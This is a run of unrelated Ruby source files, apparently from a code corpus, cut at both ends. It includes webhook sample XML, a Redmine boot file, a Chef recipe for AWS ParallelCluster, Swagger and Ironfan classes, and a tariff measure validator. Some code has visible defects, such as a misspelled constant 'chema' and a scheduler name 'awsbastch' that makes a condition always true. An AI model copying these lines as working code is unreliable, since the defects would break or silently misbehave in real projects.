<id>#{id}</id>
<transaction-ids type="array">
<item>afv56j</item>
<item>kj8hjk</item>
</transaction-ids>
<success type="boolean">true</success>
<retry type="boolean">false</retry>
<merchant-account>
<id>merchant_account_token</id>
<currency-iso-code>USD</currency-iso-code>
<sub-merchant-account type="boolean">false</sub-merchant-account>
<status>active</status>
</merchant-account>
<amount>100.00</amount>
<disbursement-date type="date">2014-02-10</disbursement-date>
<exception-message nil="true"/>
<follow-up-action nil="true"/>
</disbursement>
XML
end
def _account_updater_daily_report_sample_xml(id)
<<-XML
<account-updater-daily-report>
<report-date type="date">2016-01-14</report-date>
<report-url>link-to-csv-report</report-url>
</account-updater-daily-report>
XML
end
def _auth_status_transitioned_sample_xml(id)
<<-XML
<connected-merchant-status-transitioned>
<merchant-public-id>#{id}</merchant-public-id>
<status>new_status</status>
<oauth-application-client-id>oauth_application_client_id</oauth-application-client-id>
</connected-merchant-status-transitioned>
XML
end
def _auth_paypal_status_changed_sample_xml(id)
<<-XML
<connected-merchant-paypal-status-changed>
<oauth-application-client-id>oauth_application_client_id</oauth-application-client-id>
<merchant-public-id>#{id}</merchant-public-id>
<action>link</action>
</connected-merchant-paypal-status-changed>
XML
end
def _ideal_payment_complete_sample_xml(id)
<<-XML
<ideal-payment>
<id>#{id}</id>
<status>COMPLETE</status>
<issuer>ABCISSUER</issuer>
<order-id>ORDERABC</order-id>
<currency>EUR</currency>
<amount>10.00</amount>
<created-at>2016-11-29T23:27:34.547Z</created-at>
<approval-url>https://example.com</approval-url>
<ideal-transaction-id>1234567890</ideal-transaction-id>
</ideal-payment>
XML
end
def _ideal_payment_failed_sample_xml(id)
<<-XML
<ideal-payment>
<id>#{id}</id>
<status>FAILED</status>
<issuer>ABCISSUER</issuer>
<order-id>ORDERABC</order-id>
<currency>EUR</currency>
<amount>10.00</amount>
<created-at>2016-11-29T23:27:34.547Z</created-at>
<approval-url>https://example.com</approval-url>
<ideal-transaction-id>1234567890</ideal-transaction-id>
</ideal-payment>
XML
end
end
end
| 34.898026 | 109 | 0.579838 |
1d9a39669ab63f3d93a8b8920d02201ffc94421d | 592 | # Load the rails application
require File.expand_path('../application', __FILE__)
# Make sure there's no plugin in vendor/plugin before starting
vendor_plugins_dir = File.join(Rails.root, "vendor", "plugins")
if Dir.glob(File.join(vendor_plugins_dir, "*")).any?
$stderr.puts "Plugins in vendor/plugins (#{vendor_plugins_dir}) are no longer allowed. " +
"Please, put your Redmine plugins in the `plugins` directory at the root of your " +
"Redmine directory (#{File.join(Rails.root, "plugins")})"
exit 1
end
# Initialize the rails application
RedmineApp::Application.initialize!
| 39.466667 | 92 | 0.741554 |
6acd7beac88c3f5419e3b83ff324a588120f027f | 201 | def tau(n)
return 1 if n == 1
2 * (1..Math.sqrt(n)).count { |i| n % i == 0 }
end
n, i = 3, 3
while tau(n) < 500
n, i = n+i, i+1
end
result = n
puts result
raise Error unless result == 76576500
| 14.357143 | 48 | 0.562189 |
383e98f58949028dfd16b5f87137beb6d5019590 | 938 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Apis
module LanguageV1beta2
# Version of the google-apis-language_v1beta2 gem
GEM_VERSION = "0.4.0"
# Version of the code generator used to generate this client
GENERATOR_VERSION = "0.2.0"
# Revision of the discovery document this client was generated from
REVISION = "20210319"
end
end
end
| 32.344828 | 74 | 0.731343 |
5d37ddb111b1e1b733b23d8617b40dc2527986c8 | 552 | module Navigation
class NavbarComponent < ViewComponent::Base
private
def resources
helpers.navigation_resources
end
def nav_link(link_text, link_path)
class_name = "active" if first_uri_segment_matches_link?(link_path)
tag.li class: class_name do
link_to_unless_current link_text, link_path
end
end
def first_uri_segment_matches_link?(link_path)
current_uri = request.path
if (matches = /^\/[^\/]*/.match(current_uri))
matches[0] == link_path
end
end
end
end
| 22.08 | 73 | 0.677536 |
87caa420f570b07faa3d114591670d2e2bb9a236 | 3,248 | # frozen_string_literal: true
#
# Cookbook Name:: aws-parallelcluster
# Recipe:: prep_env
#
# Copyright 2013-2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the
# License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
# Validate OS type specified by the user is the same as the OS identified by Ohai
validate_os_type
# Validate init system
raise "Init package #{node['init_package']} not supported." unless node['init_package'] == 'systemd'
# Determine scheduler_slots settings and update instance_slots appropriately
node.default['cluster']['instance_slots'] = case node['cluster']['scheduler_slots']
when 'vcpus'
node['cpu']['total']
when 'cores'
node['cpu']['cores']
else
node['cluster']['scheduler_slots']
end
# NOTE: this recipe must be included after instance_slot because it may alter the values of
# node['cpu']['total'], which would break the expected behavior when setting scheduler_slots
# to one of the constants looked for in the above conditionals
include_recipe "aws-parallelcluster-config::disable_hyperthreading"
# Setup directories
directory '/etc/parallelcluster'
directory '/opt/parallelcluster'
directory '/opt/parallelcluster/scripts'
directory node['cluster']['base_dir']
directory node['cluster']['sources_dir']
directory node['cluster']['scripts_dir']
directory node['cluster']['license_dir']
directory node['cluster']['configs_dir']
# Create ParallelCluster log folder
directory '/var/log/parallelcluster/' do
owner 'root'
mode '1777'
recursive true
end
template '/etc/parallelcluster/cfnconfig' do
source 'prep_env/cfnconfig.erb'
mode '0644'
end
link '/opt/parallelcluster/cfnconfig' do
to '/etc/parallelcluster/cfnconfig'
end
template "/opt/parallelcluster/scripts/fetch_and_run" do
source 'prep_env/fetch_and_run.erb'
owner "root"
group "root"
mode "0755"
end
# Install cloudwatch, write configuration and start it.
include_recipe "aws-parallelcluster-config::cloudwatch_agent"
# Configure additional Networking Interfaces (if present)
include_recipe "aws-parallelcluster-config::network_interfaces" unless virtualized?
include_recipe "aws-parallelcluster-config::mount_home" if node['cluster']['node_type'] == "ComputeFleet"
include_recipe "aws-parallelcluster-config::fetch_config" unless node['cluster']['scheduler'] == 'awsbastch'
include_recipe "aws-parallelcluster-slurm::prep_env" if node['cluster']['scheduler'] == 'slurm'
include_recipe "aws-parallelcluster-byos::prep_env" if node['cluster']['scheduler'] == 'byos'
| 38.666667 | 121 | 0.693658 |
b926d519e8fef9fc1f6fc473108b6266f3c0f66a | 104 | unless Symbol.method_defined? :empty?
class Symbol
def empty?
to_s.empty?
end
end
end
| 13 | 37 | 0.653846 |
623d6391e93ccaeaa938e420832f8e87105945af | 3,473 | require 'vintage/swagger/object'
require 'vintage/swagger/objects/items'
require 'vintage/swagger/objects/schema'
require 'vintage/grape/param'
module Vintage
module Swagger
module Objects
class Parameter < Vintage::Swagger::Object # https://github.com/swagger-api/swagger-spec/blob/master/versions/2.0.md#parameter-object
swagger_attr :name, :in, :description, :required, :schema,
:type, :format, :allowEmptyValue, :items,
:collectionFormat, :default, :maximum,
:exclusiveMaximum, :minimum, :exclusiveMinimum,
:maxLength, :minLength, :pattern, :maxItems,
:minItems, :uniqueItems, :enum, :multipleOf
def self.parse(new_parameter)
return nil unless new_parameter
p = Vintage::Swagger::Objects::Parameter.new
%w(name in description required).each do |field|
p.send("#{field}=", new_parameter[field])
end
if p.in == 'body'
p.schema = Vintage::Swagger::Objects::chema.parse(new_parameter['schema'])
else
%w(type format allowEmptyValue collectionFormat default maximum exclusiveMaximum minimum exclusiveMinimum maxLength minLength pattern maxItems minItems uniqueItems enum multipleOf).each do |field|
p.send("#{field}=", new_parameter[field])
end
p.items = Vintage::Swagger::Objects::Items.parse(new_parameter['items'])
end
p
end
def name=(new_name)
raise ArgumentError.new('Vintage::Swagger::Objects::Parameter#name called with nil') if new_name.nil?
@name = new_name
end
def in=(new_in)
raise ArgumentError.new('Vintage::Swagger::Objects::Parameter#in= called with nil') if new_in.nil?
raise ArgumentError.new("Vintage::Swagger::Objects::Parameter#in= called with invalid value #{new_in}") unless %w(query header path formData body).include?(new_in)
@in = new_in
end
def items=(new_items)
raise ArgumentError.new('Vintage::Swagger::Objects::Parameter#items= items is nil') if new_items.nil? && @type == 'array'
if !new_items.nil? && !new_items.is_a?(Vintage::Swagger::Objects::Items)
new_items = Vintage::Swagger::Objects::Items.parse(new_items)
end
@items = new_items
end
def self.from_grape(grape_parameter)
return nil if grape_parameter.nil? || grape_parameter.last[:type].is_a?(Hash) || grape_parameter.last[:type] == 'Hash'
grape_type = Vintage::Grape::Param.new(grape_parameter.last).to_swagger
parameter = Vintage::Swagger::Objects::Parameter.new
parameter.name = grape_parameter.first
parameter.in = 'formData'
parameter.description = grape_type['description']
parameter.required = grape_type['required']
parameter.default = grape_type['default']
parameter.type = grape_type['type']
parameter.format = grape_type['format']
if parameter.type == 'array'
items = Vintage::Swagger::Objects::Items.new
items.type = 'string'
parameter.items = items
end
parameter.type.nil? ? nil : parameter
rescue => e
puts "error processing parameter #{grape_parameter} [#{e}]"
raise e
end
end
end
end
end
| 39.91954 | 208 | 0.621077 |
39f4e3bbf7ec75c2d27e098c8e92a0baba52c40b | 4,921 | module Ironfan
class Dsl
class Component < Ironfan::Dsl
include Gorillib::Builder
include Gorillib::Concern
include Ironfan::Plugin::Base; register_with Ironfan::Dsl::Compute
field :cluster_name, Symbol
field :facet_name, Symbol
field :realm_name, Symbol
field :name, Symbol
def initialize(attrs, &blk)
attrs.merge!(facet_name: (attrs[:owner].name unless attrs[:owner].nil? or not attrs[:owner].is_a?(Facet)),
cluster_name: (attrs[:owner].cluster_name unless attrs[:owner].nil?),
realm_name: (attrs[:owner].realm_name unless attrs[:owner].nil?))
super attrs, &blk
end
def self.plugin_hook owner, attrs, plugin_name, full_name, &blk
(this = new(attrs.merge(owner: owner, name: full_name), &blk))._project(owner)
this
end
def announce_to node
node.set['components']["#{cluster_name}-#{name}"]['name'] = name
end
def self.to_node
super.tap do |node|
node.set['cluster_name'] = cluster_name
end
end
def self.from_node(node = NilCheckDelegate.new(nil))
cluster_name = node['cluster_name'].to_s
super(node).tap{|x| x.receive!(cluster_name: cluster_name,
realm_name: cluster_name.split('_').first)}
end
def self.announce_name
plugin_name
end
def announce_name
self.class.announce_name
end
def _project(compute)
compute.component name, self
project(compute)
end
def realm_announcements
(@@realm_announcements ||= {})
end
def realm_subscriptions component_name
(@@realm_subscriptions ||= {})[component_name] ||= []
end
def announce(component_name)
Chef::Log.debug("announced #{announce_name} for #{cluster_name}")
realm_announcements[[realm_name, component_name]] = [cluster_name, facet_name]
realm_subscriptions(component_name).each{|blk| blk.call(cluster_name, facet_name)}
end
def discover(component_name, &blk)
if already_announced = realm_announcements[[realm_name, component_name]]
yield *already_announced
else
Chef::Log.debug("#{cluster_name}: no one announced #{announce_name}. subscribing")
realm_subscriptions(component_name) << blk
end
end
end
module Discovery
include Gorillib::Builder
extend Gorillib::Concern
magic :server_cluster, Symbol
magic :bidirectional, :boolean, default: false
(@_dependencies ||= []) << Gorillib::Builder
module ClassMethods
def default_to_bidirectional default=true
magic :bidirectional, :boolean, default: default
end
end
def set_discovery compute, keys
if server_cluster
wire_to(compute, full_server_cluster, keys)
else
# I'm defanging automatic discovery for now.
raise StandardError.new("must explicitly specify a server_cluster for discovery")
# discover(announce_name) do |cluster_name, facet_name|
# wire_to(compute, [cluster_name, facet_name].join('-'), keys)
# end
end
end
def wire_to(compute, full_server_cluster_v, keys)
discovery = {discovers: keys.reverse.inject(full_server_cluster_v){|hsh,key| {key => hsh}}}
(compute.facet_role || compute.cluster_role).override_attributes(discovery)
# FIXME: This is Ec2-specific and probably doesn't belong here.
client_group_v = client_group(compute)
server_group_v = security_group(full_server_cluster_v)
group_edge(compute.cloud(:ec2), client_group_v, :authorized_by_group, server_group_v)
group_edge(compute.cloud(:ec2), client_group_v, :authorize_group, server_group_v) if bidirectional
Chef::Log.debug("discovered #{announce_name} for #{cluster_name}: #{discovery}")
end
protected
def client_group(compute)
security_group(compute.cluster_name, (compute.name if compute.is_a?(Facet)))
end
def full_server_cluster
"#{realm_name}_#{server_cluster}"
end
def group_edge(cloud, group_1, method, group_2)
cloud.security_group(group_1).send(method, group_2)
Chef::Log.debug("component.rb: allowing access from security group #{group_1} to #{group_2}")
end
def security_group(*target_components)
target_components.compact.join('-')
end
end
module Announcement
include Gorillib::Builder
def _project(compute)
announce announce_name
super compute
end
end
def to_manifest
to_wire.reject{|k,_| _skip_fields.include? k}
end
def _skip_fields() skip_fields << :_type; end
def skip_fields() [] end
end
end
| 31.544872 | 114 | 0.640114 |
1cd78764835b91cc9b691e8cb27c3d37aaa65d6c | 110 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'page_by_page'
require 'minitest/autorun'
| 22 | 58 | 0.754545 |
e9f224583a2a0936f32045bc403529e245a8ce42 | 1,631 | #
# Be sure to run `pod lib lint CenfoWebAPICaller.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'CenfoWebAPICaller'
s.version = '0.1.0'
s.summary = 'A short description of CenfoWebAPICaller.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/Steven/CenfoWebAPICaller'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Steven' => 'Steven' }
s.source = { :git => 'https://github.com/Steven/CenfoWebAPICaller.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = 'CenfoWebAPICaller/Classes/**/*'
# s.resource_bundles = {
# 'CenfoWebAPICaller' => ['CenfoWebAPICaller/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 37.930233 | 108 | 0.646842 |
7a91d2086b5717d4ad58202462bcc2f445fe9bb4 | 207 | require "sequel"
db =
if RUBY_PLATFORM.match?(/java/)
"jdbc:sqlite::memory:"
else
"sqlite::memory:"
end
SEQUEL_DB = Sequel.connect(db)
require_relative "./schema"
require_relative "./models"
| 15.923077 | 33 | 0.68599 |
212ce92420359e19d600b309b871ab610c1eca38 | 81 | class Request < ActiveRecord::Base
include Referrer::TrackedModelAdditions
end
| 20.25 | 41 | 0.82716 |
d5635222cdbfcc4920c1603330c140c4136fe88b | 3,297 | require 'spec_helper'
require 'presenters/v3/to_many_relationship_presenter'
module VCAP::CloudController::Presenters::V3
RSpec.describe ToManyRelationshipPresenter do
class ToManyRelationship
def initialize(guid)
@guid = guid
end
def guid
@guid.to_s
end
end
def generate_relationships(count)
relationships = []
(1..count).each do |i|
relationships << ToManyRelationship.new(i)
end
relationships
end
let(:data) { [] }
let(:build_related) { true }
let(:relation_url) { 'cash/guid' }
let(:relationship_path) { 'money' }
let(:decorators) { [] }
subject(:relationship_presenter) { ToManyRelationshipPresenter.new(relation_url, data, relationship_path, build_related: build_related, decorators: decorators) }
let(:url_builder) { VCAP::CloudController::Presenters::ApiUrlBuilder }
describe '#to_hash' do
let(:result) { relationship_presenter.to_hash }
context 'when there are no relationships' do
it 'does not populate the relationships' do
expect(result[:data]).to be_empty
end
it 'provides a links section' do
expect(result[:links]).to eq({
self: {
href: url_builder.build_url(path: "/v3/#{relation_url}/relationships/#{relationship_path}")
},
related: {
href: url_builder.build_url(path: "/v3/#{relation_url}/#{relationship_path}")
}
}
)
end
end
context 'when there is relationship data' do
context 'a single relationship' do
let(:data) { generate_relationships(1) }
it 'returns a list of guids for the single relationship' do
expect(result[:data]).to eq(
[
{ guid: '1' }
]
)
end
end
context 'for multiple relationships' do
let(:data) { generate_relationships(5) }
it 'returns a list of guids for each relationship' do
expect(result[:data]).to eq(
[
{ guid: '1' },
{ guid: '2' },
{ guid: '3' },
{ guid: '4' },
{ guid: '5' }
]
)
end
end
end
context 'when build_related is false' do
let(:build_related) { false }
it 'does not include a related field in links' do
expect(result[:links]).to eq({
self: {
href: url_builder.build_url(path: "/v3/#{relation_url}/relationships/#{relationship_path}")
}
})
end
end
context 'when a decorator is provided' do
let(:fake_decorator) { double }
let(:impl) do
->(hash, resources) do
hash.tap { |h| h[:included] = { resource: { guid: "included #{resources[0].guid}" } } }
end
end
before { allow(fake_decorator).to receive(:decorate, &impl) }
let(:decorators) { [fake_decorator] }
let(:data) { generate_relationships(1) }
it 'uses the decorator' do
expect(result[:included]).to match({ resource: { guid: 'included 1' } })
end
end
end
end
end
| 28.669565 | 165 | 0.548377 |
6acd889dddc5ca2ab6c0388a2e2603cc16a9ba02 | 1,412 | require 'cases/helper'
require 'models/topic'
class InvalidDateTest < ActiveRecord4116::TestCase
def test_assign_valid_dates
valid_dates = [[2007, 11, 30], [1993, 2, 28], [2008, 2, 29]]
invalid_dates = [[2007, 11, 31], [1993, 2, 29], [2007, 2, 29]]
valid_dates.each do |date_src|
topic = Topic.new("last_read(1i)" => date_src[0].to_s, "last_read(2i)" => date_src[1].to_s, "last_read(3i)" => date_src[2].to_s)
# Oracle DATE columns are datetime columns and Oracle adapter returns Time value
if current_adapter?(:OracleAdapter)
assert_equal(topic.last_read.to_date, Date.new(*date_src))
else
assert_equal(topic.last_read, Date.new(*date_src))
end
end
invalid_dates.each do |date_src|
assert_nothing_raised do
topic = Topic.new({"last_read(1i)" => date_src[0].to_s, "last_read(2i)" => date_src[1].to_s, "last_read(3i)" => date_src[2].to_s})
# Oracle DATE columns are datetime columns and Oracle adapter returns Time value
if current_adapter?(:OracleAdapter)
assert_equal(topic.last_read.to_date, Time.local(*date_src).to_date, "The date should be modified according to the behavior of the Time object")
else
assert_equal(topic.last_read, Time.local(*date_src).to_date, "The date should be modified according to the behavior of the Time object")
end
end
end
end
end
| 42.787879 | 154 | 0.67847 |
38f59acf957ba96159663db6166ca0d57a32e5e7 | 1,276 | # ba_tester
#
# This file was automatically generated by APIMATIC v2.0
# ( https://apimatic.io ).
module BaTester
# BaseController.
class BaseController
attr_accessor :config, :http_call_back
def initialize(config, http_call_back: nil)
@config = config
@http_call_back = http_call_back
@global_headers = {
'user-agent' => 'APIMATIC 3.0'
}
end
def validate_parameters(args)
args.each do |_name, value|
raise ArgumentError, "Required parameter #{_name} cannot be nil." if value.nil?
end
end
def execute_request(request, binary: false)
@http_call_back&.on_before_request(request)
APIHelper.clean_hash(request.headers)
request.headers.merge!(@global_headers)
response = if binary
config.http_client.execute_as_binary(request)
else
config.http_client.execute_as_string(request)
end
@http_call_back&.on_after_response(response)
response
end
def validate_response(response)
raise APIException.new 'HTTP Response Not OK', response unless
response.status_code.between?(200, 208) # [200,208] = HTTP OK
end
end
end
| 26.583333 | 88 | 0.628527 |
ede2ef058963489360cacd070914a56d59cbef21 | 246 | # frozen_string_literal: true
module Subjective
##
# Base class for validator strategies.
#
class ValidatorStrategy
attr_reader :context_klass
def initialize(context_klass)
@context_klass = context_klass
end
end
end
| 16.4 | 40 | 0.727642 |
1d12caf2a17bc2e9050796cfe659fbf7e9fee1ec | 78 | class Target < ActiveResource::Base
self.site = "http://localhost:3001/"
end | 26 | 38 | 0.730769 |
7abefd9f4ee72d4213c7dd93d6f717b177c19506 | 23,707 | class MeasureValidator < TradeTariffBackend::Validator
validation :ME1, 'The combination of measure type + geographical area + goods classification item id + additional code type + additional code + order number + reduction indicator + start date must be unique.', on: %i[create update], if: ->(record) { record.not_update_of_the_same_measure? } do
validates :uniqueness, of: %i[measure_type_id geographical_area_sid goods_nomenclature_sid additional_code_type_id additional_code_id ordernumber reduction_indicator validity_start_date]
end
validation :ME2, 'The measure type must exist.', on: %i[create update] do |record|
MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).any?
end
validation :ME3, 'The validity period of the measure type must span the validity period of the measure.', on: %i[create update] do
validates :validity_date_span, of: :measure_type, extend_message: true
end
validation :ME4, 'The geographical area must exist.', on: %i[create update] do
validates :presence, of: :geographical_area
end
validation :ME5, 'The validity period of the geographical area must span the validity period of the measure.', on: %i[create update] do
validates :validity_date_span, of: :geographical_area, extend_message: true
end
validation :ME6, 'The goods code must exist.',
on: %i[create update],
if: ->(record) {
# NOTE wont apply to national invalidates Measures
# Taric may delete a Goods Code and national measures will be invalid.
# ME9 If no additional code is specified then the goods code is mandatory (do not validate if additional code is there)
# do not validate for export refund nomenclatures
# do not validate for if related to meursing additional code type
# do not validate for invalidated national measures (when goods code is deleted by Taric, and CHIEF measures are left orphaned-invalidated)
(
record.additional_code.blank? &&
record.export_refund_nomenclature.blank? &&
(!record.national? || !record.invalidated?)
) &&
(record.additional_code_type.present? &&
!record.additional_code_type.meursing?)
} do
validates :presence, of: :goods_nomenclature
end
validation :ME7, 'The goods classification code must be a product code; that is, it may not be an intermediate line.', on: %i[create update] do |record|
# NOTE wont apply to national invalidates Measures
# Taric may delete a Goods Code and national measures will be invalid.
(record.national? && record.invalidated?) ||
record.goods_nomenclature.blank? ||
(record.goods_nomenclature.present? && record.goods_nomenclature.producline_suffix == "80") || (
record.export_refund_nomenclature.present? && record.export_refund_nomenclature.productline_suffix == "80"
)
end
validation :ME8, 'The validity period of the goods code must span the validity period of the measure.',
on: %i[create update] do
validates :validity_date_span, of: :goods_nomenclature, extend_message: true
end
validation :ME9, 'If no additional code is specified then the goods code is mandatory.', on: %i[create update] do |record|
record.additional_code_id.present? || (record.additional_code_id.blank? && record.goods_nomenclature_item_id.present?)
end
validation :ME10, 'The order number must be specified if the "order number flag" (specified in the measure type record) has the value "mandatory". If the flag is set to "not permitted" then the field cannot be entered.', on: %i[create update] do |record|
measure_type = MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).first
measure_type.present? &&
((record.ordernumber.present? && measure_type.order_number_capture_code == 1) ||
(record.ordernumber.blank? && measure_type.order_number_capture_code != 1))
end
validation :ME12, 'If the additional code is specified then the additional code type must have a relationship with the measure type.',
on: %i[create update],
extend_message: ->(record) { record.measure_sid.present? ? "{ measure_sid=>\"#{record.measure_sid}\" }" : nil } do |record|
(record.additional_code_type.present? && AdditionalCodeTypeMeasureType.where(additional_code_type_id: record.additional_code_type_id,
measure_type_id: record.measure_type_id).any?) ||
record.additional_code_type.blank?
end
validation :ME13, 'If the additional code type is related to a Meursing table plan then only the additional code can be specified: no goods code, order number or reduction indicator.', on: %i[create update] do |record|
(record.additional_code_type.present? &&
record.additional_code_type.meursing? &&
record.meursing_additional_code.present? &&
record.goods_nomenclature_item_id.blank? &&
record.ordernumber.blank? &&
record.reduction_indicator.blank?) ||
(record.additional_code_type.present? && !record.additional_code_type.meursing?) ||
record.additional_code_type.blank?
end
validation :ME14, 'If the additional code type is related to a Meursing table plan then the additional code must exist as a Meursing additional code.', on: %i[create update] do |record|
(record.additional_code_type.present? &&
record.additional_code_type.meursing? &&
record.meursing_additional_code.present?
) || (
record.additional_code_type.present? && !record.additional_code_type.meursing?
) ||
record.additional_code_type.blank?
end
# FIXME: https://trello.com/c/COQPnHr2/602-dit-tq-128-edit-quota-measures-is-throwing-with-conformance-errors-needs-to-check-if-these-are-valid-me16-and-me119-6
# validation :ME16,
# %(Integrating a measure with an additional code when an equivalent or overlapping
# measures without additional code already exists and vice-versa, should be forbidden.),
# on: [:create, :update] do |record|
# valid = true
#
# attrs = {
# goods_nomenclature_item_id: record.goods_nomenclature_item_id,
# goods_nomenclature_sid: record.goods_nomenclature_sid,
# measure_type_id: record.measure_type_id,
# geographical_area_sid: record.geographical_area_sid,
# ordernumber: record.ordernumber,
# reduction_indicator: record.reduction_indicator,
# additional_code_type_id: record.additional_code_type_id,
# additional_code_id: record.additional_code_id
# }
#
# if record.modified?
# scope = Measure.where(attrs)
# scope = scope.where("measure_sid != ?", record.measure_sid) if record.measure_sid.present?
#
# if record.updating_measure.present?
# scope = scope.where("measure_sid != ?", record.updating_measure.measure_sid)
# end
#
# scope = if record.validity_end_date.present?
# scope.where(
# "(validity_start_date <= ? AND (validity_end_date >= ? OR validity_end_date IS NULL)) OR
# (validity_start_date >= ? AND (validity_end_date <= ? OR validity_end_date IS NULL))",
# record.validity_start_date, record.validity_start_date,
# record.validity_start_date, record.validity_end_date,
# )
# else
# scope.where(
# "(validity_start_date <= ? AND (validity_end_date >= ? OR validity_end_date IS NULL))",
# record.validity_start_date, record.validity_start_date,
# )
# end
#
# valid = scope.count.zero?
# end
#
# valid
# end
validation :ME17, "If the additional code type has as application 'non-Meursing' then the additional code must exist as a non-Meursing additional code.",
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.non_meursing? } do |record|
record.additional_code.present?
end
validation :ME19,
%(If the additional code type has as application 'ERN' then the goods code must be specified
but the order number is blocked for input.),
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.application_code.in?("0") } do |record|
record.goods_nomenclature_item_id.present? && record.ordernumber.blank?
end
validation :ME21,
%(If the additional code type has as application 'ERN' then the combination of goods code + additional code
must exist as an ERN product code and its validity period must span the validity period of the measure),
on: %i[create update],
if: ->(record) {
record.additional_code_type.present? &&
record.additional_code_type.application_code.present? &&
record.additional_code_type.application_code.in?("0") &&
record.goods_nomenclature_item_id.present? && record.additional_code.present?
} do
validates :validity_date_span, of: :additional_code_type, extend_message: true
end
#validation :ME24, 'The role + regulation id must exist. If no measure start date is specified it defaults to the regulation start date.', on: [:create, :update] do
#validates :presence, of: [:measure_generating_regulation_id, :measure_generating_regulation_role]
#end
validation :ME25, "If the measure's end date is specified (implicitly or explicitly) then the start date of the measure must be less than or equal to the end date.",
on: %i[create update],
if: ->(record) { (record.national? && !record.invalidated?) || !record.national? } do
validates :validity_dates
end
validation :ME26, 'The entered regulation may not be completely abrogated.' do
validates :exclusion, of: %i[measure_generating_regulation_id
measure_generating_regulation_role],
from: -> {
CompleteAbrogationRegulation.select(:complete_abrogation_regulation_id,
:complete_abrogation_regulation_role)
}
end
validation :ME27, 'The entered regulation may not be fully replaced.', on: %i[create update] do |record|
record.generating_regulation.present? && !record.generating_regulation.fully_replaced?
end
validation :ME29, 'If the entered regulation is a modification regulation then its base regulation may not be completely abrogated.', on: %i[create update] do |record|
(record.generating_regulation.is_a?(ModificationRegulation) && record.modification_regulation.base_regulation.not_completely_abrogated?) ||
!record.generating_regulation.is_a?(ModificationRegulation)
end
validation :ME32,
%(There may be no overlap in time with other measure occurrences with a goods code in the
same goods classification hierarchy which references the same measure type, geo area, order number,
additional code and reduction indicator. This rule is not applicable for Meursing additional
codes.),
on: %i[create update],
extend_message: ->(record) { record.measure_sid.present? ? "{ measure_sid=>\"#{record.measure_sid}\" }" : nil },
if: ->(record) { record.additional_code.present? && record.additional_code_type.present? && record.additional_code_type.non_meursing? } do |record|
record.duplicates_by_attributes.count.zero?
end
validation [:ME33, :ME34], 'A justification regulation may not be entered if the measure end date is not filled in
A justification regulation must be entered if the measure end date is filled in.', on: %i[create update] do |record|
(record[:validity_end_date].blank? &&
record.justification_regulation_id.blank? &&
record.justification_regulation_role.blank?) ||
(record[:validity_end_date].present? &&
record.justification_regulation_id.present? &&
record.justification_regulation_role.present?)
end
validation :ME39, "The validity period of the measure must span the validity period of all related partial temporary stop (PTS) records.", on: %i[create update] do
validates :validity_date_span, of: :measure_partial_temporary_stops
end
#
# NEED_TO_CHECK
#
# validation :ME40,
# %(If the flag "duty expression" on measure type is "mandatory" then at least one measure component
# or measure condition component record must be specified. If the flag is set "not permitted" then
# no measure component or measure condition component must exist. Measure components and measure
# condition components are mutually exclusive. A measure can have either components or condition
# components (if the ‘duty expression’ flag is ‘mandatory’ or ‘optional’) but not both.),
# on: [:create, :update] do |record|
# valid = true
# if record.measure_type.try(:measure_component_applicable_code) == 1 # mandatory
# valid = !record.measure_components.empty? || record.measure_conditions.any? { |mc| !mc.measure_condition_components.empty? }
# end
# if record.measure_type.try(:measure_component_applicable_code) == 2 # not permitted
# valid = record.measure_components.empty? && record.measure_conditions.all? { |mc| mc.measure_condition_components.empty? }
# end
# valid
# end
validation :ME86, 'The role of the entered regulation must be a Base, a Modification, a Provisional Anti-Dumping, a Definitive Anti-Dumping.', on: %i[create update] do
validates :inclusion, of: :measure_generating_regulation_role, in: Measure::VALID_ROLE_TYPE_IDS
end
# validation :ME87,
# %(The validity period of the measure (implicit or explicit) must reside
# within the effective validity period of its supporting regulation. The
# effective validity period is the validity period of the regulation taking
# into account extensions and abrogation.), on: [:create, :update] do |record|
# valid = record.validity_start_date.present?
# if valid
# if record.validity_end_date.present? && record.generating_regulation_id.present
# generating_regulation = record.generating_regulation
# regulation_start_date = generating_regulation.validity_start_date
# regulation_end_date = generating_regulation.effective_end_date.presence ||
# generating_regulation.validity_end_date
# valid = (regulation_start_date <= record.validity_start_date) &&
# (regulation_end_date >= record.validity_end_date)
# end
# end
# valid
# end
validation :ME88, 'The level of the goods code, if present, cannot exceed the explosion level of the measure type.', on: %i[create update] do |record|
# NOTE wont apply to national invalidates Measures
# Taric may delete a Goods Code and national measures will be invalid.
# TODO is not applicable for goods indent numbers above 10?
(record.national? && record.invalidated?) ||
